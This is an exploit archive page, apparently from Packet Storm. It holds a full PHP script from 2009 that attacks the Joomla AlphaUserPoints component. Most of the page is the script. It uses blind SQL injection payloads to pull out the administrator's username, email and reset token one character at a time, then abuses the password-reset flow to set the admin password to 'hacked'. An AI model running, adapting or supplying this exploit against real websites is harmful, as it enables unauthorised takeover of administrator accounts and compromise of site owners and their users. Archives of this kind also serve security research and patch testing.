what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla AlphaUserPoints SQL Injection

Joomla AlphaUserPoints SQL Injection
Posted Sep 15, 2009
Authored by jdc

Joomla AlphaUserPoints component remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | b10471a1cb7a7e563acfe04ced9fee0d1fd7b074d451465f55a4207293a247b5

Joomla AlphaUserPoints SQL Injection

Change Mirror Download
<?php
echo '<h2>Joomla Component AlphaUserPoints SQL Injection Exploit</h2>';
echo '<h4>jdc 2009</h4>';
echo '<fieldset><legend>Buffer</legend><div id="update" style="padding:8px;"></div></fieldset>';
echo '<script type="text/javascript">var update = document.getElementById("update");</script>';
ini_set( "memory_limit", "128M" );
ini_set( "max_execution_time", 0 );
set_time_limit( 0 );
if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
$vulnerableFile = "http://".$_GET['url']."/components/com_alphauserpoints/assets/ajax/checkusername.php";
$url = $vulnerableFile;
$data = array();
$admin = '';
$data['username2points'] = "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 ORDER BY id ASC LIMIT 1 -- '";
$output = getData();
echo 'Cheching for exploit...';
if( !testData( $output ) ) die( 'Failed. Target may have magic quotes on.' );
echo 'done!<br />';
if( isset( $_GET['check'] ) ) die( $output );
echo 'Getting admin username & email (this may take some time)...';
for( $i=1;$i<250;$i++ )
{
$len = strlen( $admin );
$continue = FALSE;
for( $j=32; $j<126; $j++ )
{
if( $continue ) continue;
$data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(username,0x3a,email),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
$output = getData();
if( testData( $output ) )
{
$admin .= chr( $j );
echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>';
$continue = TRUE;
}
ob_end_flush();
ob_flush();
flush();
}
if( $len == strlen( $admin ) ) break;
}
if( strlen( $admin ) == 0 ) die( 'failed!' );
echo '<script type="text/javascript">update.innerHTML = "";</script>';
echo "done!<br />";
echo "<h4>$admin</h4>";
$admin = explode( ':', $admin );
echo "<br />Generating token...";
$url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&tmpl=component";
$data = array();
$token = preg_replace( array( '/\n/', '/(?:.*)name="([a-f0-9]{32})"(?:.*)/m' ), array( '', '$1' ), getData() );
if( strlen( $token ) != 32 ) die( 'failed!' );
echo 'done!<br />';
echo 'Resetting password...';
$url = "http://".$_GET['url']."/index.php?option=com_user&task=requestreset";
$data = array( 'email' => $admin[1], $token => 1 );
getData();
echo 'done!<br />';
echo 'Getting Reset Token...';
$url = $vulnerableFile;
$data = array();
$activation = '';
for( $i=1;$i<100;$i++ )
{
$len = strlen( $activation );
$continue = FALSE;
for( $j=48; $j<126; $j++ )
{
if( $continue ) continue;
$data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(activation),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
$output = getData();
if( testData( $output ) )
{
$activation .= chr( $j );
echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>';
$continue = TRUE;
}
ob_end_flush();
ob_flush();
flush();
}
if( $len == strlen( $activation ) ) break;
}
if( strlen( $activation ) == 0 ) die( 'failed!' );
echo 'done!<br />';
echo 'Sending Reset Token...';
$url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete";
$data = array( 'token' => $activation, $token => 1 );
getData();
echo 'done!<br />';
echo 'Resetting Password to "hacked"...';
$url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete";
$data = array( 'password1' => 'hacked', 'password2' => 'hacked', $token => 1 );
getData();
echo 'done!<br />';
echo '<hr />';
echo 'You may now log in as admin using the following credentials:<br />';
echo '<strong>'.$admin[0].'</strong> / <strong>hacked</strong><br />';
echo '<a href="http://'.$_GET['url'].'/administrator/">Start hacking!</a>';


function shutUp( $buffer ) { return false; }
function testData( $output ) { return preg_match( '/OK/', $output ); }
function getData()
{
global $data, $url;
ob_start( "shutUp" );
$ch = curl_init();
curl_setopt( $ch, CURL_TIMEOUT, 120 );
curl_setopt( $ch, CURL_RETURNTRANSFER, 0 );
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_COOKIEFILE, 'aup.cookie.txt' );
curl_setopt( $ch, CURLOPT_COOKIEJAR, 'aup.cookie.txt' );
if( count( $data ) > 0 )
{
curl_setopt( $ch, CURLOPT_POST, count( $data ) );
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) );
}
curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
$result = curl_exec( $ch );
curl_close( $ch );
$return = ob_get_contents();
ob_end_clean();
return $return;
}

/* jdc 2009 */




Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close